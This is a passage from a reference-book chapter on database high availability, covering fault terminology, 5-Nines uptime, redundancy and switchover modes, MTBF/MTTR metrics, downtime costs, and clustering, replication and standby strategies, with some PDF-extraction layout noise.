a failure is said to be a fault. Faults are identified or detected in some manner, either by the system or by its users. Finally, an error is a discrepancy between the displayed output (e.g., computed, measured, or observed value or condition) and the correct or specified value or condition. Errors are often the result of exceptional conditions or unexpected interference. If an error occurs, then a failure of some form has occurred. Similarly, if a failure occurs, then an error of some form will occur. It is important to detect not only active faults, but also the latent faults. Finding and removing these faults before they become active leads to less downtime and higher availability. Availability is defined as the readiness for usage. The continuation of service, in the absence of failure, is called reliability. The nonoccurrence of catastrophic consequences or injury to the environment or its users is called safety. Businesses have crossed geographical, cultural, and political boundaries in today’s world. Information is the key for survival in the highly competitive global business environment. High availability of information requires information technology resources to be available round the clock, seven days a week, 365 days a year. Availability is generally understood as the percentage of the time a system is up and running. Once the terms that describe availability are understood, it is then necessary to understand the various availability paradigms and solutions. Solutions include data redundancy, system failover, and network redundancy. These solutions can be combined to provide a highly available system that provides the necessary level of service to the users of the system. The paradigms involve the ways that these solutions are combined.
of the system, including hardware redundancy (Klein, 1988). The software components of the system use the redundant hardware to enable the service and application availability. 5-Nine implementations have its foundation in the set of principles. Some of these principles are related only to hardware, while other principles are related to software system components. The following list of issues focuses on providing the service high availability (Parikh, 2004): •
•
•
Achieving 5-Nines Availability The 99.999% (5-Nines) availability standard specifies 24/7 service with a maximum of five minutes of downtime in a year. Generally, service availability depends heavily on the fault tolerance
•
Mitigation of risks: Risk mitigation depends on monitoring (real-time and historical) trends, rules, and models to predict the occurrence of failures and to prevent them. Common risk mitigation techniques are: o Fault avoidance: use of processes and tools to minimize the introduction of faults; o Fault minimization: In spite of efforts to prevent or eliminate them, there will be faults in any system. Proper risk assessment and fault minimization can ensure uptime; and o Fault recognition and removal: Monitoring and recognition can actively locate faults and assist with remediation of their root cause. Resiliency: the capability of a system to prevent degradation or failure as well minimize the damage or loss from a failure or malfunction; resiliency is affected by quality, design and stability Redundancy: the use of multiple redundant critical components, such as CPUs, network cards, electrical transmission, power supplies, disk drives, switches, routers, cooling systems, and other equipment used to support operations; redundancy is not limited to hardware, it can also include mirrored applications or databases, setup, and configuration files. Inclusion: including high availability through the entire application stack, includ-
1901
Database High Availability
•
•
•
•
•
1902
ing the client, middleware, and hardware Serviceability: the ability of the service to detect and rapidly correct problems and reconfigure itself online Manageability: the ease and ability to evaluate and tune for maintenance and availability, to identify critical resources, traffic patterns, and performance levels, and to configure business-critical applications Methods and skills: To achieve a 5-Nines environment, the administration, monitoring, and control of the high availability IT environment must be simple. Otherwise, installation issues, upgrades, human error, and customization will affect the system’s availability. Because user error is a growing cause of outages, it needs to apply techniques to reduce the chance of user/administrator error. Scalability: Scalability of the system, network database, and applications is the key to availability. An available, well-defined, and properly-configured scalable platform is one that has enough capacity to handle the estimated or measured application’s workload, with no bottleneck in the hardware. For software division, achieving the goal of scalability and therefore dependability and availability requires effort at all phases of development: design time, implementation time, execution time, and during maintenance. System architecture: Poor planning architecture or operational support can foster poor performance, impeded functionality, high cost of ownership, complex administration, lack of capacity and scalability, and poor reliability and availability. A properly developed system, on the other hand, is one that is of high quality, high performance, and high availability with a capacity for growth. Proper database system architecture requires understanding the business requirements. The points that should be considered
in planning the architecture of any system might be the storage and I/O subsystem, ability to support growth, well-defined use and capacity planning, elimination of data redundancy, elimination of process redundancy, implementation and integration planning, and administration automation.
Maintaining Uptime and Availability Uptime refers to the ability of conducting business in the event of partial system failure or unexpected demand. Organizations can prioritize, modularize, and segregate their business functions, provide redundancies, and establish processes to turn on or off pieces of their system and still continue to function. Availability is a measure of the ability of clients to connect with and use a resource at any point in time. Carrier-class Information Technology (IT) infrastructures are the new standard for high-availability, zero-downtime, computing enterprises that serve a global customer base on 24/7/365 basis (Barraza, 2002). As the world becomes more wired and huge new global Web services become available, there will be no alternative to carrier-class services (Lemme & Colby, 2001). The impact of any downtime will simply become too traumatic for companies to opt for anything less than the most reliable quality service available. In order to improve the provided service uptime and availability, a set of maintaining issues should be taken into consideration: •
•
Data protection: Any data critical to business needs to be protected; backups are the easiest way to protect such data. Even with frequent backups, it should still employ data protection safeguards through the use of hardware, replication, or software to bridge backup periods. Disaster recovery: The capability to recover from natural disasters, such as fires, floods, earthquakes, or tornados, is as important as
Database High Availability
•
•
•
being able to recover from a hardware or software failure. Results of these disasters usually include physical damage or complete loss of systems, data, and even workplaces. Recovery time is directly related to how much upfront planning occurred and what procedures were established to restore the business locally. The impact and likelihood of a disaster and its cost to the business must be weighed against the cost of preventing the damage that results from such a disaster. Application protection and recovery: Web servers are an excellent example of why application recoverability is a critical issue. Most companies with e-commerce servers cannot afford the business impact of unplanned downtime. Companies should give careful consideration to the design and use of an application in a high availability situation, with the primary goal being to insulate the users from outages or system failures. Methods include employing client reconnect to an alternative server if a connection is lost, using error-handling, automating tasks, and setting up recoverable transactions. Network management: The network has become so ubiquitous in the computing environment. Proper network architecture, planning, maintenance, and monitoring are just as important as with any other system components or applications. System management monitoring and measurement: Database administrators often overlook the planning and selection of the architecture, procedure, and systemmanagement processes. A vast majority of installations occur on an existing platform because of available space. Then, after the application is in production, performance and administration problems appear. To combat this cycle, systems must be properly planned, architected, and refined through a
•
•
•
set of methods and processes. It is not enough to slap in a set of monitoring tools and expect them to take care of all deficiencies. True system management involves monitoring, measuring, altering, and reporting on the levels of availability, performance, and service. System-management tools can also provide real-time business applications for the many operational components. System management usually begins with taking measurements, setting baselines for uptime, and establishing performance metrics. Automating processes: Human errors are the leading cause of downtime; any effort to reduce human interaction with the system will reduce the risk of human errors. In order to eliminate downtime, tools should be employed to perform the systems’ automation, control, or monitoring. Risk reducing might be implemented through the use of automation in the several areas like backups and recovery, upgrades, operations and administration, maintenance, usage, security, and control. Training and support: Training and support are critical to sustain and maintain availability. With technology and product updates, personnel must be able to quickly judge which features and upgrades map to existing business requirements. Annual training as well as participation in user groups can help users keep abreast of issues, features, and technologies. Standards and documentation: The written standards and procedures should provide the foundation for implementation. Without consistent standards and procedures, a project will decline into an indecipherable hodgepodge of unsupportable variations and techniques. Documentation is also important for employees new to the department or database. Standards, procedures, and documentation for the 5-Nines environ-
1903
Database High Availability
ment should include the following (Lemme, 2002): o Operating system (OS) standards and procedures: These include file system layouts, kernel parameters, system backup/recovery, security, performance monitoring, installation, and upgrades of the operating system. o Database standards and procedures: These include instance parameters, object sizing, storage and naming conventions, procedures for installation and upgrades, security guidelines, and backup/recover plans. o Application development standards: These include techniques for managing change procedures, detailed coding standards including source code control, change control, naming conventions, and table/index creating. o Network standards and procedures: These define network addressing and protocols supported for database and application communication.
High Availability (Reliability, Redundancy, and Service Availability) Convergence of data communication, electronic, and Web services technologies has created demand for ever-increasing levels of availability. The 5-Nines (99.999%) system availability is no longer enough. Now network users, for instance, are demanding and expecting continuous delivery of voice, data, and multimedia services: They want always-on services and connections that are maintained without disruption regardless of any internal system faults or failures. A Service Availability solution is a customer-centric approach to meeting these demands (Service Availability, 2000). Conceptualizing and design for availability have been technology-centric: Providing robust hardware, adding redundancy in case of failure, and improving switchover techniques to backup components have produced the current generation of high-availability strategies. These strategies provide higher levels of system uptime, but the ser-
Table 2. The main differences between the three switchover modes Switchover mode Cold Switchover
Warm Switchover
Hot Switchover
1904
Technique Used Initialization of the standby component upon switchover
Recovery time
Slowest
Maintain transaction state
Notes
NO
Conserves power and resources
Data can be saved to the standby component, but the application needs to be configured at the time of switchover, adding restart time to the switchover process.
Slow
NO
Cannot support uninterrupted connections during switchover
Application and transaction state data must be continuously checkpointed to the standby device, faults must be quickly detected and the system must be reconfigured
Fastest
YES
Complex to implement
Database High Availability
vice availability approach requires this and more. Undisrupted service means preserving application data and state across switchover scenarios. It requires aggressive optimization and integration of all system resources, and it requires a global perspective focused on the end-user experience of continuous service. In the subsequent paragraphs, a discussion of the detailed meaning of reliability, redundancy, high and service availability are illustrated: in addition, the three switchover modes are mentioned, with the abstracted differences between them. •
•
Reliability—Designing with integrity (hardware orientation): Reliability is a measure of how dependable a system is once it is actually put into use (not breaking down). Designing for reliability aims at fault prevention. In designing for availability, it is predicted that components will fail, and systems are designed to mask and recover from the failure of individual resources. Originally, the reliability strategy was, first build great hardware that does not break down, and then, to be completely covered, supply a backup system just in case. Reliability, while effective for hardware, is not enough when complex software is also involved. Software is inherently less reliable, as every possible configuration of use and data cannot be tested prior to release; therefore, software glitches are often revealed only when the software is actually put into use. As systems become more and more software-driven, fault prevention has become an unrealizable standard, now replaced by fault management. The notion of reliability has had to be reconsidered in system design. Redundancy— Replacement par ts (component orientation): Building with redundancy addresses potential failures by establishing a backup system for critical components. Full 2N redundancy is the
duplication of components such that each active component has its own backup. It is the simplest redundancy configuration to manage, since processes can be mirrored on the redundant standby system for total system failover, if needed. But full redundancy is often prohibitively expensive, unnecessary, and impractical for complex systems (High Availability and More, 2001). Utilizing redundancy in complex systems requires dynamic system reconfiguration in order for the system to remain available. When redundancy is designed into a system, the system downtime is a factor of the frequency of failures multiplied by the time required to switchover to a standby component. Standby redundant components in the 2N design can be configured in one of the following three switchover modes. Table 2 summarizes the main features for the three switchover modes. o Cold switchover: This mode requires initialization of the standby component upon switchover. Of the three, this mode has the slowest recovery time, and it cannot maintain transaction state; however, it does conserve power and resources. o Warm switchover: Data can be saved to the standby component, but the application needs to be configured at the time of switchover, adding restart time to the switchover process. This mode cannot support uninterrupted connections during switchover (if an application has to be rebooted when a server fails, transactions in process at the time of the failure are lost). o Hot switchover: This mode has the fastest recovery time, but it is the most complex to implement: Application and transaction state data must be continuously checkpointed to the standby device, faults must be quickly detected,
1905
Database High Availability
•
•
1906
and the system must be reconfigured. Hot switchover redundancy designs support the higher levels of availability, but simply having redundancy obviously does not produce system availability; it is the management of hardware, software, and data redundancy; the management of faults; and the management of system reconfiguration that yields availability. High availability (system orientation): Internet-based services and businesses need always-on availability. In availability management, hardware or software faults are unavoidable, and the system is designed to anticipate and work around faults before they become system failures. Thus, instead of counting on the hardware to avoid faults, availability and especially the high availability design relies heavily on management software to mask and manage faults that are expected to occur (Service Availability, 2000). Fault management takes practical precedence over designing for fault avoidance; the goal is to anticipate faults and execute fault recovery as quickly as possible. In the race towards ever greater levels of system availability, providing the quickest possible recovery times becomes the key. Availability management software must execute the fastest possible switchover to redundant resources and immediate reconfiguration of the system. In addition, 5-Nines levels of system availability cannot tolerate downtime for upgrading or maintenance. High availability management must be able to handle hardware and software upgrades without taking the system out of service. These requirements all are necessary to providing system availability, but they do not fully account for the needs of customers using the systems. Service availability—Customer-centric focus (service orientation): The emergence
of the Service Availability model as a driving concept in system design represents a shift from a technology-centric orientation to a customer-centric one. A service availability solution includes providing high availability at the level of 5-Nines or better, but it adds the requirement of service continuity, maintaining the integrity of customer connections and transactions without interruption despite any hardware or software failures in the infrastructure. Neither scheduled maintenance nor unexpected failure ought to prevent or disrupt provision of service to a customer. A service availability solution requires that a system be highly available and provide continuity of service. A system configured with redundant components that fail can switchover to the standby components without ultimately jeopardizing the metrics of reliability or availability, even though connections might be dropped or data lost or degraded. Thus, a service availability solution carries the caveat that, during switchover scenarios, customer data and application state must be preserved in order to provide continuity of service to the end-user. Service availability design requires a perspective that can account for and coordinate resources and technologies throughout the system. It requires real-time checkpointing of current data to hot standby resources and rapid, seamless switchover in case of active resource failure. Because the continuity of service ultimately depends on the resources and the functioning of the system as a whole, service availability management requires an integrated, totalsystem approach.
HIGH AVAILABILITY ENVIRONMENT To understand availability, we first need to understand reliability. The reliability of an element
Database High Availability
is the conditional probability that the element will operate during a specified period of time. A system may be considered highly reliable (that is, it may fail very infrequently), but, if it is out of service for a significant period of time as a result of a failure, it will not be considered highly available (Singh, 2001). As another definition, high availability is more than excellent reliability. It is achieved through high service availability, the avoidance of downtime (including all maintenance downtime), and extreme data integrity, with no loss of stored data under any circumstances (High Availability White Paper, 2001). Availability, usually measured on an annual basis, refers to the percentage of time which service is available to the users (Sauers, 1996). This covers mission-critical applications, e-mail, scheduling services, and other business solutions used by organizations and companies for their day-to-day operations. There are two factors that determine system availability. The first factor is the reliability of the individual components that comprise the system. These components include server hardware, the server operating system, and the application itself. Other components may include data storage devices, network access devices, databases, file systems, and the data center infrastructure. The second factor is the time it takes for the application to be restored once a failure has occurred. The amount of time it takes to bring an application online again is dependent on the component that failed. If the application itself has failed, all that may be required for recovery is to simply restart the application (Bender & Joshi, 2004).
Levels of Availability •
High availability: This is a system or application designed to prevent a total loss of service by reducing or managing failures. The major goal of a highly available system is to provide a higher level of availability than
•
•
a standard system. It achieves this goal by preventing Single Points of Failure (SPOF) through common hardware including CPU, disks, host adapters, network adapters, hubs, and routers. Fault tolerance: More expensive than a highly available system (by as much as five times), a fault-tolerance system contains multiple hardware components that function concurrently, duplicating all the computation incorporating redundant hardware components in a single system. However, a fault-tolerant system can fail when the system or application software fails. Continuous availability: As the name suggests, these systems are designed to provide continuous availability, which equates to non-stop service, with no planned or unplanned outages. Hardware and software failures can occur. However, the intention is to insulate the users from the failure and to reduce the time needed to recover from that failure to several minutes or less. In a continuously- available system environment, patches and upgrades can be performed with no impact on the users.
We can contrast the main difference in concept between fault tolerance and high availability. Fault tolerance provides additional resources that allow an application to continue functioning after a component failure without interruption (A Framework for System High Availability, 2000; Brown, 2000; Providing Open Architecture, 2001). Many of the high-availability solutions on the market today actually provide fault tolerance for a particular application component. Disk mirroring, where there are two disk drives with identical copies of the data, is an example of a fault-tolerant component. If one of the disk drives fails, there is another copy of the data that is instantly available for the application to continue execution. A fault-tolerant system would be used in a situation
1907
Database High Availability
Box 1. MTBF Availability = MTBF + MTTR
Total Downtime in a year = (Planned Shutdown + UnplannedShutdown) in hours Availability of a system = Number of hours in a year ⎞⎟⎠ − ⎛⎜⎝ Total hours of downtime in a year ⎞⎟⎠ ×100 ⎛ Number of hours in a year ⎞ ⎟ ⎜ ⎠ ⎝
⎛ ⎜ ⎝
where no downtime can be tolerated at all, such as air-traffic-control systems, emergency-response systems, or financial-trading systems.
Metrics of High Availability Availability is a function of system reliability and reparability, augmented and supported by redundancy. To quantify and identify the availability of any system, academic and industry sectors have defined two metrics that formalize the definition of a system’s availability: •
•
1908
Reparability—Mean time To recover (MTTR): Achieving high availability is also a factor of how quickly a system can be repaired when failures occur. Reparability is the measure of how quickly a failed device can be restored to service, expressed as a Mean Time To Repair (MTTR). The industry and the academic world today concentrate on finding solutions to reduce this time and to make it transparent to the users. Reliability—Mean time between failures (MTBF): Individual components have their own MTBFs. The MTBF of a system can be calculated by considering the failure rate of each component in the system. As systems have more and more components, the system MTBF will always go down. Today’s industry has made significant progress in achieving very good MTBF
through redundant hardware and software (e.g., clustered nodes to avoid single point of failure, application availability standpoint, etc.). Another way of expressing availability is referred to as number of Nines. This is expressed as a percentage of uninterrupted service per year and hence the downtime. A system is considered highly available when its availability is 99.9%, also called “3-Nines” (Arora, 2005; Bauer, 2001; Brien, 2000). For example, 528 minutes of system unavailability per year results in 99.9% or “3-Nines availability”, and 5 minutes of system unavailability per year results in a 99.999% or “5-Nines availability”. In the absence of any redundancy in the system platform, availability is given by a simple formula shown in Box 1. Achieving an acceptable level of availability in carrier-grade systems just by striving for high MTBFs and low MTTRs is generally not practical with today’s technology, due to two factors. First, despite tremendous advances in the reliability of computer hardware, the system MTBFs of complex systems are too low because of the number of components they contain. This is particularly true since failures are caused by software errors as well as hardware faults. Second, most service providers are not willing to deploy a system which is subject to a multiple-hour outage while it is being repaired, regardless of how unlikely that outage
Database High Availability
may be. To attack both of these problems, high availability systems invariably contain redundant components (High Availability and More, 2001; Standards for a Service Availability, 2002). •
Redundancy: Redundancy augments the reparability of individual components by establishing a backup or standby for various components in the system. When there are multiple resources providing the same functionality, they can take over for one another very quickly in case of failure, driving the system MTTR toward zero. The effectiveness of redundancy is a function of how much redundancy a system contains, and how quickly backup components can be brought into service when failures occur.
•
•
•
Costs of Service Downtime Uptime is usually the measurement of availability that refers to the time at which users can access the application. Downtime is the opposite of uptime; it is the amount of time that a database system or service becomes unavailable to users. There are two ways to categorize system downtime. Some downtimes are results from a system failure and others are results from scheduled outages. Scheduled outages, such as those for repair and upgrades that have minimal impact on the business, are considered maintenance. For many applications, availability during business hours is required, but some downtime during non-business hours is acceptable. System failure outages can be caused by environmental causes such as loss of electricity, fires, floods, and earthquakes in addition to platform failures, application failures, or human errors. Although hardware failures are traditionally the major cause of downtime, software failures and user error are growing. Generally there are three types of downtime (Barraza, 2002; Kumar, 2005; Saito, Bershad, & Levy, 1999):
Planned downtime: This is normal downtime that is planned and scheduled in advance. It is normally scheduled for patches, upgrades, and maintenance activities such as database reorganization, adding disk storage, performing offline backups, and installing patches, upgrades, or new application. It usually occurs during off-peak processing times such as off-hours or holidays. Semi-planned downtime: This includes software or hardware upgrades that are scheduled, but not entirely by the service provider. An example might be when a vendor releases security patches that must be applied quickly to avoid vulnerability. The schedule is largely driven by others. Unplanned downtime: Unplanned downtime is associated with unexpected events such as network, hardware, and software failures. A typical distributed application usually consists of a Web browser front-end and an application reliant upon servers, networks, and database. As a problem with any of these components can cause the application to become unavailable, all components need to be monitored equally.
Many harmful consequences may occur as a result of service downtime. The following set of instances illustrates the high impact of service downtime (Gribble, Brewer, Hellerstein, & Culler, 2000): •
Downtime means down revenue: When an application that runs a business is brought down by database failure, the most immediate and obvious cost is the loss of revenue. Typically, an e-commerce site may suffer losses from $10K to $100K every hour, depending on the volume of the online sales transactions. Large telesales businesses like airline reservations, catalog sales, and TV-based home shopping can easily miss sales opportunities of $100K per hour. In
1909
Database High Availability
•
•
•
•
1910
financial markets, losses total to millions of dollars per hour of downtime. Downtime damages relationships: Many organizations now offer Web-based applications and interfaces that provide access to databases. Some of these provide customers, in a self-service fashion, with information about their outstanding orders or account balances. Other applications give partners (e.g., suppliers and distributors) access to inventory levels and production schedules. Such applications are very valuable. Therefore, customers and partners develop dependencies and expect them to be available continuously. Database downtime thwarts these expectations, thus damaging important relationships. Customers and partners may shift their business elsewhere, perceiving downtime as a lack of dependability. Downtime disrupts supply chains: In the manufacturing sector, database downtime can hamper material management and resources planning, which, in turn, reduces yield on the production floor. Likewise, in the retail industry, database downtime halts just-in-time inventory, which depends heavily on database access. When a trade exchange suffers database downtime, it disrupts the supply chains of hundreds of companies. Downtime erodes brand and share value: For a company that operates largely online, all it takes is a well-publicized outage to tarnish the company’s reputation. Once a brand is deemed unreliable, financial consequences usually follow on the perception-driven stock market, adversely affecting share price, financial evaluation, and market capital. Downtime has legal repercussions: When companies do business together online, they often strike a contract like a service-level agreement. A service outage can cost the provider dearly in fines and litigation. As
protection from these legal repercussions, service providers and Web services companies need to ensure the highest availability possible for databases and applications.
Key Requirements of a Service Availability Solution Continuous availability of voice, data, and multimedia communication services depends on each part of the multi-service networks working reliably to deliver these services without interruption. Hardware and software redundancy enables the management software to replace failed resources with the appropriate standby resources such that services remain available. Accomplishing this without downtime or loss of data and state requires a comprehensive and unified solution. The entire availability management cycle must operate automatically, without human intervention and in real-time (High Availability and More, 2001). Information about the system must be collected and assessed in order to keep the system manageable. System resources must be represented, and their status, topology, and dependencies must be modeled and monitored. System faults must be quickly detected, diagnosed, and fixed. Fault data must be provided to an intelligent availability-management service in order to have it to quickly and appropriately respond by initiating appropriate actions to reconfigure the status and the resources functioning. In other words, the system must be self-managing and self-reliant. Thus, implementation of a service availability solution requires management software that can: • • • •
Collect system data in real-time Configure and maintain state-aware model of the total system Checkpoint data to redundant resources Detect, diagnose, and isolate faults
Database High Availability
• •
•
Perform rapid and policy-based recovery Dynamically manage configuration and dependencies of all components in the system Provide administrative access and control
STRATEGIES FOR DATABASE AVAILABILITY There are two attributes of database availability. These are: (i) the severity of database downtime and the latency of database recovery that provide a context for understanding general categories like high availability, continuous availability, and disaster recovery; and (ii) specific strategies for database availability like maintenance, clusters, replication, and backup/restore (Russom, 2001).
Severity of Database Downtime When it comes to database availability, continuous availability, where the database never suffers downtime, rises as the most important matter. This goes beyond the requirements of most users. Therefore many companies require their content to be of high availability in order to allow for planned downtime to maintain their databases. Planned downtime is not severe, because it is always scheduled for periods of low system activity. Even with the best-laid plans, some form of hardware or software failure is inevitable. When database availability strategy cannot recover automatically, unplanned downtime occurs; this is fairly severe, because it may require IT personnel hours to restore database operations. However, IT departments with welldesigned plans can recover quickly and minimize unplanned downtime to provide a relatively high level of database availability. Catastrophic downtime, the severest level of database downtime, occurs when hardware and
facilities are damaged such that they cannot be repaired. Catastrophic events include hurricanes, tornados, flooding, earthquakes, fires, and explosions. When these destroy or damage a physical site, the strategy for disaster recovery must include a pre-prepared facility at a separate site. Ideally, the original site and the recovery site should be separated by a fair amount of geographic space. This is to ensure that both sites do not suffer downtime from the same catastrophic event. Note that multiple, geographically-dispersed data centers are not just for disaster recovery. This strategy can also ensure continuous availability when the primary data center is knocked out due to a disabling temporary event such as a rolling blackout.
Latency of Database Recovery Latency has two meanings for database availability. The first refers to the amount of time it takes to return to full operation after a failure. Technical people sometimes use temperature as an analogy for quantifying the recovery period. For instance, clusters are hot; in that case, failover is instantaneous and seamless, whereas the timeconsuming process of restoring a database from a backup tape is cold. Somewhere between these extremes, replication technologies are considered warm. The second meaning of latency is how up-todate the database meta-content is after the failure, as compared to before. For example, when a database is corrupted at noon, and is restored from a backup from the previous midnight, twelve hours of inserts and updates are lost. Likewise, with asynchronous forms of replication, the standby database may be a few minutes behind the primary one, simply because it takes time to collect and communicate data over a network.
1911
Database High Availability
STRATEGIES FOR DATABASE AVAILABILITY Online and Offline Maintenance Maintenance is the main factor to determine the database availability. For instance, most planned downtime is devoted to database maintenance or reconfiguration. Although planned, bringing down the database for maintenance is, nonetheless, a downtime that cannot help but impact someone in businesses that operate 24x7. Furthermore, many database administrators and IT managers confess that maintenance tasks sometimes go awry, thus extending planned downtime into unplanned downtime. For these reasons, modern database administrators insist on performing maintenance operations online whenever possible. With some databases, it is now possible to execute online backups, table reorganization, reindexing, fault isolation, and so forth. This reduces planned downtime, as well as the probability of that it may extend into unplanned downtime (Lumpkin, 2004). Furthermore, online maintenance enables database administrators to lightly adapt to change, without waiting for a window of planned downtime. Related to maintenance is the issue of configuration. In the early days of database management systems, the smallest change of data structure or operating environment required the database administrator to halt the database and restart it with new parameters. That is unthinkable in today’s fast changing business environment. Restart is a form of downtime. Therefore, a database that supports dynamic reconfiguration is an important and integral component of any high availability strategy.
High Availability Clusters Hardware clusters with database servers are the preferred strategy for achieving the shortest period for recovery after a hardware or database failure.
1912
A cluster typically has two or more nodes with a database server active on each to create a hot standby capability (Low Cost High Availability, 2004). If a database server fails, another can take its load instantaneously, assuring continuous availability to client applications. Although the hot standby capability of a high availability cluster provides the least latent path to recovery, clustering has serious geographic limitations. Communication between nodes usually takes place via some form of Small Computer System Interface (SCSI( or other protocol that is not suited to Wide Area Network (WAN) or Internet communications. Therefore, nodes of a cluster must sit in close proximity, usually in the same data center. This works well until an event makes the data center unusable, whether temporarily or on a longer term. Thus, a cluster must be complemented by another database availability strategy that involves multiple and geographicallydispersed data centers to ensure continuity when the primary cluster fails.
Warm Standby Replication and Switching Replication is a software strategy for duplicating data from a primary database to a standby. Warm standby replication means that the standby is kept online and fully operational such that it can take over immediately and automatically when the primary database fails. To keep the two databases synchronized, transactions are replicated on a continuous or scheduled basis. The two databases run on separate servers, writing to separate disk devices. Therefore, a failure on one leaves the other unaffected. On the upside, failover is fairly immediate because the replicated warm standby database is always online. The servers for the primary and standby databases can be physically located in different geographies communicating via WAN; thus losing one site brings down only one server. The replication process does not affect application
Database High Availability
performance because it executes asynchronously after a transaction is committed. Replication software can operate in tandem with clustered and/or fault-tolerant hardware achieving higher levels of availability. On the downside, however, the warm standby database tends to be latent because it takes time to communicate data additions and changes. During peak times, the load on the primary server may starve the replication process, causing the standby to be several minutes behind. Although warm standby replication is excellent for automatic database server failover, it is of no help with client failover. In general, client applications must restart to connect to the new server after failover. To get around this limitation, warm standby replication can be complemented with a switching mechanism, which ensures that clients do not need to reconnect in the event of a failover. With switching technologies, automatic client failover is transparent to most end-users who see only a slight delay while the switch is made. In short, warm standby replication (combined with switching) approaches the low data latency, and seamless server and client failover of a cluster. However its geographic flexibility makes warm standby replication ideal for disaster recovery after the catastrophic loss of a data center.
Cold Standby As a low-end strategy for database availability, many companies depend on backup and restore. After all, the utility programs that come with a database management system as well as assistant tools have reached a mature stage where they are feature-rich, robust, and fast. Plus, the best practices for backup and restore are easy to grasp and straightforward to implement. But there is a catch. It takes time to restore a database after a failure or corruption. The restore process could last for hours, while end-users sit idle. Hence, with a backup and restore strategy,
there is considerable latency, as well as latency in the sense of a delta between the content of the backup and the primary database at the moment of failure (Disaster Recovery Package, 2004). The latency of backup and restore can be reduced considerably by implementing a so-called cold standby which simply extends the backup process by an extra step that restores backups to a standby database server. Since the standby database is cold, it takes a few minutes to bring it online, but this is a fraction of the latency of a restore process. If the scenario periodically sends transaction logs from the primary to the standby, it will serve to reduce the latency of database content. Hence, a cold standby extends tried-and-true backup-andrestore procedures to achieve database high availability with a level of data loss that is acceptable for lower-valued transactions.
PERFORMANCE IMPACT ON AVAILABILITY Downtime is not the only concern when dealing with high availability. Most large applications encounter diverse processing needs. On one hand, the online users require good response time from many short transactions. On the other hand, large batch jobs (e.g., reports and complex extracts) expect high throughput of a handful of very large transactions. These conflicting needs cause response time to fluctuate, decreasing the reliability and availability of the application. This is especially a concern with applications that provide services directly to end users and consumers such as in e-commerce applications.
Redundancy is the Key to Availability The logical solution for increased availability is to maintain the data in more than one place. Coincidentally, one of the best solutions for improving the application response time is to separate the batch
1913
Database High Availability
reporting and extract processing from the Online Transaction Processing (OLTP). This solution also requires a redundant database. This means that owners of large critical applications are seeking a solution that provides both high availability and the ability to offload non-critical processing from the main system (Aronoff, 2003). The criteria for a comprehensive high availability and high performance solution include existence of a full copy of the primary database, which should be accessible even when there is no emergency, mainly for reporting and extracts. Furthermore, the copy of the database should be an up-to-date image of the primary database. When a disaster occurs, the copy should be capable of becoming the primary database (failover). After the disaster, the solution should take into account the switch back to the primary system. Certainly, failover practice to the secondary database should be very fast, and no data should be lost during the process.
•
Range of Common Solutions There is a wide range of solutions to the high availability problem. The most common approaches are (Aronoff, 2003): •
•
1914
Local disk mirroring: This approach provides protection against many disk-related failures, but the mirror is usually not breakable under normal circumstances. Once broken, the mirror becomes stale relative to the copy that is still operational. To resynchronize, many disk mirror solutions perform a complete copy of the data from the operational copy to the stale copy. If the database is large, this process can take a long time. Such an approach does not provide a resolution for a local disaster. It also does not provide protection against physical block corruption or accidental loss of data due to a database administrator’s (DBA) error. Remote disk mirroring: Remote disk mir-
•
roring provides the protection of disk mirroring, but to a remote location. Remote disk mirroring comes in two flavors: synchronous and asynchronous. With asynchronous mirroring, the primary system does not wait for the data to be committed to the remote disk. With synchronous mirroring, the application waits for the data to be committed to both the local and the remote disk. In asynchronous mirroring, when a switchover is required, the DBA will not be able to open the remote database. For this reason, most remote mirroring implementations use the synchronous method. However, with this method, a wide bandwidth is needed between the source and destination. Otherwise, the network will slow the primary system. Standby databases: This solution provides some protection against a catastrophe that makes the primary database unavailable. This solution has some shortcomings. The copy is only as current as to when the last log was applied. Once the database is opened and modified, a complete image is required to reconstruct the standby database. Additionally, there is some administration required for the standby database as the structure of the source database changes, such as adding data files or auto-extending table spaces. Also, the standby database does not provide protection against certain types of database block corruption. Local clustering: Local clustering is a hardware solution that enables multiple computers to share a set of disks. Applications on these computers are written such that they can freely migrate between the machines in the clusters using a technology known as floating IP addresses. This approach provides good protection against most common failures. However, since there is only one copy of the database, there should still be consideration for protection of the disks. Moreover, since there is only one copy of
Database High Availability
•
•
the database, any physical block corruption or accidental dropping of a database object will cause the application to fail. Replication: Replication provides the ability to have a live remote database that can be used both to reduce the workload of the primary system and for failover when a disaster happens. The live database on the remote site does require database administration, and application of patches to the application is not straightforward. Local clustering with oracle parallel server: Database Parallel Servers offers another alternative for high availability systems. Using this facility, many instances of database running on different hardware can access the same database on shared disks. This does permit the hardware that would be allocated for a standby system to be actively used in production.
The difficulty in using such approach for highly available solutions is that the application needs to be designed such that transferring blocks between instances (pinging) is minimized. If not, application performance can be severely degraded. Also, there is only one copy of the database that is not protected from disk failures, block corruption, or human errors such as accidental table drop.
DATABASE AVAILABILITY SOLUTIONSAVAILABLE FROM DBMS VENDORS The explosive growth in e-services and other Internet-based applications, along with the increased demand for 24/7/365 global operations, has placed a greater emphasis on the need for continuous data and system availability. There are two main hardware concerns with respect to maintaining a highly available database environment: server high availability and storage availability (Arora, 2005). High availability of the database tier is
achieved by the implementation of clustering. Operating system vendors and database vendors have devised their own methods to implement clustering for the database server. As many of today’s enterprise applications rely on commercial databases, this section is intended to demonstrate and review the current best practice regarding their design and configuration. Although there are many similarities between database products, we base our discussion on the different practices offered by today’s database management systems. The primary technological consideration in a database high-availability environment is protection against server failure. Server failure can be defined as an unplanned event that causes the server system to be inaccessible by users (Otey & Otey, 2005). A number of different factors can cause server failure due to both hardware and software causes including: • • •
Hardware failure (CPU, RAM, storage, I/O, or power supply) Operating system or device driver failure Database server failure
The protection approach against hardware failure is to invest in a hardware platform that provides redundancy of key components. Whilst for the software side, this is done by keeping operating system, device drivers, and application software up-to-date with the most recent service packs (DB2 Operation, 2000). Regarding the highly available database platforms, the technological advantages of clustering technologies, database replication, and database log mirroring are the main implementation issues towards protection against database server failure. Clustering essentially uses multiple servers in an environment where one or more backup servers can seamlessly take over the workloads of a failed primary server. This section will examine each of these alternatives and discuss how they are implemented by each of the enterprise database products. 1915
Database High Availability
